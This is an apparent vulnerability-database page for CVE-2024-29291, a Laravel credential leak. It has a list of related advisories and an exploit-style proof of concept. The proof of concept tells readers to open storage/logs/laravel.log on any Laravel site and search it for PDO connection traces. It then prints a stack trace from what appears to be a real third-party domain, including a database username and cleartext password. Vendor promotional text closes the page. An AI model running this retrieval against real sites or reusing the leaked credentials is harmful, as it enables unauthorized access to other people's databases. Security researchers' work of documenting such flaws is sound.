| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Laravel Framework 11 - Credential Leakage Vulnerability | 21 Apr 202400:00 | – | zdt | |
| Laravel Framework 安全漏洞 | 16 Apr 202400:00 | – | cnnvd | |
| CVE-2024-29291 | 16 Apr 202400:00 | – | cve | |
| CVE-2024-29291 | 16 Apr 202400:00 | – | cvelist | |
| CVE-2024-29291 | 16 Apr 202423:15 | – | nvd | |
| Laravel Framework 11 Credential Disclosure | 22 Apr 202400:00 | – | packetstorm | |
| CVE-2024-29291 | 23 May 202510:19 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-29291 | 27 Feb 202500:00 | – | vulncheck_kev | |
| CVE-2024-29291 | 16 Apr 202400:00 | – | vulnrichment |
# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation